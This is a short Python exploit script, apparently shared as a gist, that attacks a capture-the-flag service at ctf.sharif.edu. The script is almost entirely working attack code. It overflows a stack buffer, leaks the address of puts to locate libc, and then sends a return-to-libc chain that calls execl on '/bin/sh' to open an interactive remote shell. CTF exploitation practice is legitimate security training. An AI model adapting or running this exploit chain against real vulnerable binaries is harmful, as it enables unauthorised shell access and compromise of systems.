#!/usr/bin/python | |
import pwn | |
import struct | |
OFFSET_HEADSHOT = struct.pack("<L",0x080483A0) | |
OFFSET_RETN = struct.pack("<L",0x080484EA) | |
OFFSET_PLT = struct.pack("<L",0x08049874) | |
OFFSET_ROPBREAK = struct.pack("<L",0x41424344) | |
p = pwn.remote("ctf.sharif.edu",4801) | |
# p = pwn.process("./vuln4") | |
# x = raw_input("Press enter to continue") | |
p.recv() | |
p.send("A"*22 + OFFSET_HEADSHOT + OFFSET_RETN + OFFSET_PLT + "\n") | |
data = p.recv() | |
OFFSET_PUTS = struct.unpack("<L",data[0:4])[0] | |
OFFSET_LIBC = OFFSET_PUTS - 0x5FCA0 | |
OFFSET_EXECL = struct.pack("<L",OFFSET_LIBC + 0x3ada0) | |
OFFSET_BINSH = struct.pack("<L",OFFSET_LIBC + 0x15ba0b) | |
print "puts at : %x" % OFFSET_PUTS | |
# print "libc at : %x" % OFFSET_LIBC | |
p.send("A"*22 + OFFSET_EXECL + OFFSET_BINSH + OFFSET_BINSH + "\n") | |
p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment